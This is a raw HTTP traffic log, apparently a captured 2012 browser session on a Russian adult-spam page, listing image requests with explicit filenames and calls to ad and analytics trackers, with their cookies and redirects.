GET /play.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Content-Length: 4569 Last-Modified: Mon, 29 Nov 2010 06:18:09 GMT Connection: keep-alive Accept-Ranges: bytes
GET /play_menu.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Content-Length: 5231 Last-Modified: Mon, 29 Nov 2010 06:18:11 GMT Connection: keep-alive Accept-Ranges: bytes
GET /image2.gif HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/gif Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 43 Last-Modified: Mon, 29 Nov 2010 06:17:55 GMT Connection: keep-alive Accept-Ranges: bytes
GET /image1.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 412 Last-Modified: Mon, 29 Nov 2010 06:17:55 GMT Connection: keep-alive Accept-Ranges: bytes
GET /porno-foto-let.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 4721 Last-Modified: Mon, 29 Nov 2010 06:18:24 GMT Connection: keep-alive Accept-Ranges: bytes
GET /negrityanka-trahaetsya-onlayn-porno.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 2965 Last-Modified: Mon, 29 Nov 2010 06:18:02 GMT Connection: keep-alive Accept-Ranges: bytes
GET /onlayn-porno-zrelih-tolstushek-smotret.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 6410 Last-Modified: Mon, 29 Nov 2010 06:18:07 GMT Connection: keep-alive Accept-Ranges: bytes
GET /hit;start-qip-ru?r;s117688524;uhttp%3A//qyqualey.fromru.su/;0.8521948213958476 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 302 Moved Temporarily Content-Type: text/html Date: Tue, 06 Nov 2012 22:36:19 GMT Server: 0W/0.8c Location: http://counter.yadro.ru/hit;start-qip-ru?q;r;s117688524;uhttp%3A//qyqualey.fromru.su/;0.8521948213958476 Content-Length: 32 Expires: Mon, 07 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: FTID=1GcP3Z3NLwn2; path=/; expires=Wed, 06 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /V13a**R%3Erbc_ru/ru/UTF-8/tmsec=pochta_hostings/428444059 HTTP/1.1 Host: www.tns-counter.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 302 Moved Temporarily Content-Type: image/gif Server: tns-counter.0.5.3 Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 43 Location: http://www.tns-counter.ru/V13b**R%3Erbc_ru/ru/UTF-8/tmsec=pochta_hostings/428444059 Connection: close Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Expires: Thu, 01 Jan 1970 00:00:01 GMT Pragma: no-cache Set-Cookie: guid=45420C03509990E3X1352241379; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.tns-counter.ru; path=/
GET /hit;pochta-ru?t26.1;r;s117688524;uhttp%3A//qyqualey.fromru.su/;0.8947012742051451 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 302 Moved Temporarily Content-Type: text/html Date: Tue, 06 Nov 2012 22:36:19 GMT Server: 0W/0.8c Location: http://counter.yadro.ru/hit;pochta-ru?q;t26.1;r;s117688524;uhttp%3A//qyqualey.fromru.su/;0.8947012742051451 Content-Length: 32 Expires: Mon, 07 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: FTID=1GcP3Z3NLwn2; path=/; expires=Wed, 06 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /ga.js HTTP/1.1 Host: www.google-analytics.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/ If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT	HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 14888 Content-Encoding: gzip Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT X-Content-Type-Options: nosniff, nosniff Date: Tue, 06 Nov 2012 13:09:22 GMT Expires: Wed, 07 Nov 2012 01:09:22 GMT Vary: Accept-Encoding Age: 34017 Cache-Control: max-age=43200, public Server: GFE/2.0
GET /p103.gif?r=&width=1176&height=885&hash=&rn=0.16650860832632897 HTTP/1.1 Host: count.rbc.ru GET /p103.gif?r=&width=1176&height=885&hash=&rn=0.16650860832632897 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/gif Server: nginx/0.7.61 Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 43 Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT Connection: close Expires: Tue, 06 Nov 2012 22:36:18 GMT Cache-Control: no-cache Set-Cookie: UID=wrokylCZkOMHjxdYPTyGAg==; expires=Wed, 06-Nov-13 22:36:19 GMT; path=/ P3P: policyref="/w3c/p3p.xml", CP="NON CURa ADMa DEVa OUR IND UNI COM NAV LOC"
GET /rb?name=Hosting_240x400&jscookie=0 HTTP/1.1 Host: r.qip.ru GET /rb?name=Hosting_240x400&jscookie=0 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20 Set-Cookie: rb_shows=1230%1ada; expires=Thu, 15 Sep 2022 20:00:00 GMT; path=/; domain=.qip.ru rb_shows_day=1230-1%1ada-1; expires=Wed, 07 Nov 2012 20:00:00 GMT; path=/; domain=.qip.ru Cache-Control: no-cache
GET /iframe?name=Hosting_subfooter&jscookie=0 HTTP/1.1 Host: r.qip.ru GET /iframe?name=Hosting_subfooter&jscookie=0 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20 Set-Cookie: rb_shows=14f2%14f4; expires=Thu, 15 Sep 2022 20:00:00 GMT; path=/; domain=.qip.ru rb_shows_day=14f2-1%14f4-1; expires=Wed, 07 Nov 2012 20:00:00 GMT; path=/; domain=.qip.ru Cache-Control: no-cache
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=624677190&utmhn=qyqualey.fromru.su&utmcs=windows-1251&utmsr=1176x885&utmvp=1159x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=%D0%9F%D0%BE%D1%80%D0%BD%D1%83%D1%85%D0%B0%20%D0%B2%20%D0%BA%D0%BB%D1%83%D0%B1%D0%B0%D1%85%20%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D0%BE%2C%20%D0%BF%D0%BE%D1%80%D0%BD%D0%BE%20%D1%80%D0%B0%D0%B7%D0%BA%D0%B0%D0%B7%D1%8B%20%D0%BE%D0%BD%D0%BB%D0%B0%D0%B8%D0%BD&utmhid=358252421&utmr=-&utmp=%2F&utmac=UA-34764375-1&utmcc=__utma%3D1.59269207.1352241379.1352241379.1352241379.1%3B%2B__utmz%3D1.1352241379.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=qh~ HTTP/1.1 Host: www.google-analytics.com GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=624677190&utmhn=qyqualey.fromru.su&utmcs=windows-1251&utmsr=1176x885&utmvp=1159x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=%D0%9F%D0%BE%D1%80%D0%BD%D1%83%D1%85%D0%B0%20%D0%B2%20%D0%BA%D0%BB%D1%83%D0%B1%D0%B0%D1%85%20%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D0%BE%2C%20%D0%BF%D0%BE%D1%80%D0%BD%D0%BE%20%D1%80%D0%B0%D0%B7%D0%BA%D0%B0%D0%B7%D1%8B%20%D0%BE%D0%BD%D0%BB%D0%B0%D0%B8%D0%BD&utmhid=358252421&utmr=-&utmp=%2F&utmac=UA-34764375-1&utmcc=__utma%3D1.59269207.1352241379.1352241379.1352241379.1%3B%2B__utmz%3D1.1352241379.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=qh~ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/gif Date: Thu, 01 Nov 2012 01:09:14 GMT Content-Length: 35 X-Content-Type-Options: nosniff Pragma: no-cache Expires: Wed, 19 Apr 2000 11:43:00 GMT Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate Age: 509225 Server: GFE/2.0
GET /hit;start-qip-ru?q;r;s117688524;uhttp%3A//qyqualey.fromru.su/;0.8521948213958476 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/ Cookie: FTID=1GcP3Z3NLwn2	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:19 GMT Server: 0W/0.8c Connection: Close Content-Length: 43 Expires: Mon, 07 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: VID=3MAuEA04x5n2; path=/; expires=Wed, 06 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /hit;pochta-ru?q;t26.1;r;s117688524;uhttp%3A//qyqualey.fromru.su/;0.8947012742051451 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/ Cookie: FTID=1GcP3Z3NLwn2	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:19 GMT Server: 0W/0.8c Connection: Close Content-Length: 149 Expires: Mon, 07 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: VID=3MAuEA04x5n2; path=/; expires=Wed, 06 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /V13b**R%3Erbc_ru/ru/UTF-8/tmsec=pochta_hostings/428444059 HTTP/1.1 Host: www.tns-counter.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/ Cookie: guid=45420C03509990E3X1352241379	HTTP/1.1 200 OK Content-Type: image/gif Server: tns-counter.0.5.3 Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 43 Connection: close Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Expires: Thu, 01 Jan 1970 00:00:01 GMT Pragma: no-cache
GET /code?pid=3001&gid=329&oin=0&rid=61826&dreferer= HTTP/1.1 Host: engine.mediamir.medialand.ru GET /code?pid=3001&gid=329&oin=0&rid=61826&dreferer= HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 301 Moved HTTP/1.1 301 Moved Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Connection: keep-alive Keep-Alive: timeout=20 X-Server: macina/0.2.15 - macina-vint Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: max-age=0, no-cache, no-cache=Set-Cookie, no-store, must-revalidate, proxy-revalidate Pragma: no-cache Content-Length: 0 P3P: policyref="http://content.relax.ru/w3c/adnet.p3p", CP="NOI DSP COR LAW CURa ADMa DEVa OUR NOR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC" Location: http://engine.mediamir.medialand.ru/test?extip=80.203.168.254&exip=80.203.168.254&pid=3001&gid=329&oin=0&rid=61826&dreferer= Set-Cookie: ctc=on%5F3; Expires=Thu, 31-Dec-2020 23:59:59 GMT; Domain=medialand.ru; Path=/ id=250780777; Expires=Thu, 31-Dec-2020 23:59:59 GMT; Domain=medialand.ru; Path=/
GET /p/a/papa.pochta.ru.12654.js?t=11210 HTTP/1.1 Host: jsn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: application/x-javascript Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:19 GMT Last-Modified: Thu, 27 Sep 2012 15:32:19 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20 Expires: Wed, 07 Nov 2012 22:36:19 GMT Cache-Control: max-age=86400 Content-Encoding: gzip
GET /test?extip=80.203.168.254&exip=80.203.168.254&pid=3001&gid=329&oin=0&rid=61826&dreferer= HTTP/1.1 Host: engine.mediamir.medialand.ru GET /test?extip=80.203.168.254&exip=80.203.168.254&pid=3001&gid=329&oin=0&rid=61826&dreferer= HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/ Cookie: ctc=on%5F3; id=250780777	HTTP/1.1 200 OK Content-Type: text/javascript; charset=utf-8 Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Connection: keep-alive Keep-Alive: timeout=20 X-Server: macina/0.2.15 - macina-kumar Cache-Control: no-cache, must-revalidate Pragma: no-cache Content-Length: 4073 P3P: policyref="http://content.relax.ru/w3c/adnet.p3p", CP="NOI DSP COR LAW CURa ADMa DEVa OUR NOR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC OTC" Set-Cookie: ctc=on%5F3; Expires=Thu, 31-Dec-2020 23:59:59 GMT; Domain=medialand.ru; Path=/ id=250780777; Expires=Thu, 31-Dec-2020 23:59:59 GMT; Domain=medialand.ru; Path=/ fci=652097-618-1-1352241379-1; Expires=Thu, 31-Dec-2020 23:59:59 GMT; Domain=engine.mediamir.medialand.ru; Path=/ plcnt=3001-1-1352327779; Expires=Thu, 31-Dec-2020 23:59:59 GMT; Domain=engine.mediamir.medialand.ru; Path=/
GET /hit;Mgidohvat/ni?rhttp%3A//qyqualey.fromru.su/;s117688524;uhttp%3A//r.qip.ru/iframe%3Fname%3DHosting_subfooter%26jscookie%3D0;0.43818001611140434 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0 Cookie: FTID=1GcP3Z3NLwn2; VID=3MAuEA04x5n2	HTTP/1.1 302 Moved Temporarily Content-Type: text/html Date: Tue, 06 Nov 2012 22:36:20 GMT Server: 0W/0.8c Location: http://counter.yadro.ru/hit;Mgidohvat/ni?q;rhttp%3A//qyqualey.fromru.su/;s117688524;uhttp%3A//r.qip.ru/iframe%3Fname%3DHosting_subfooter%26jscookie%3D0;0.43818001611140434 Content-Length: 32 Expires: Mon, 07 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: FTID=0; path=/; expires=Sat, 01 Jan 2000 00:00:00 GMT; domain=.yadro.ru
GET /images/mui.gif?11210223 HTTP/1.1 Host: counter.marketgid.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 301 Moved Permanently Content-Type: text/html Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 184 Connection: keep-alive Keep-Alive: timeout=20 Location: http://mg.yadro.ru/id.gif?muid=ca7kipzHseA1 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: muidn=ca7kipzHseA1;Domain=.dt00.net;Path=/;Max-Age=795230620; muidn=ca7kipzHseA1;Domain=.marketgid.com;Path=/;Max-Age=795230620;
GET /hit;Mgidohvat/ni?q;rhttp%3A//qyqualey.fromru.su/;s117688524;uhttp%3A//r.qip.ru/iframe%3Fname%3DHosting_subfooter%26jscookie%3D0;0.43818001611140434 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0 Cookie: VID=3MAuEA04x5n2	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:36:20 GMT Server: 0W/0.8c Connection: Close Content-Length: 43 Expires: Mon, 07 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache
GET /img/b4eeec5f/ebe50897/18d3859c/83b8e514.jpg HTTP/1.1 Host: rbqip.pochta.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/rb?name=Hosting_240x400&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 15639 Last-Modified: Tue, 28 Feb 2012 11:25:03 GMT Connection: keep-alive Keep-Alive: timeout=20 Accept-Ranges: bytes
GET /id.gif?muid=ca7kipzHseA1 HTTP/1.1 Host: mg.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0 Cookie: VID=3MAuEA04x5n2	HTTP/1.1 200 OK Content-Type: image/gif Date: Tue, 06 Nov 2012 22:27:14 GMT Server: 0W/0.8d Connection: Close Content-Length: 35 Last-Modified: Sun, 09 Sep 2001 01:46:40 GMT Expires: Wed, 07 Nov 2012 02:27:14 GMT
GET /1940/1940345_m.jpg HTTP/1.1 Host: imgn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 2872 Last-Modified: Tue, 23 Oct 2012 10:31:04 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Thu, 06 Dec 2012 22:36:20 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
GET /1955/1955825_m.jpg HTTP/1.1 Host: imgn.dt00.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://r.qip.ru/iframe?name=Hosting_subfooter&jscookie=0	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx/1.2.3 Date: Tue, 06 Nov 2012 22:36:20 GMT Content-Length: 3500 Last-Modified: Wed, 31 Oct 2012 08:10:23 GMT Connection: keep-alive Keep-Alive: timeout=20 Expires: Thu, 06 Dec 2012 22:36:20 GMT Cache-Control: max-age=2592000 Accept-Ranges: bytes
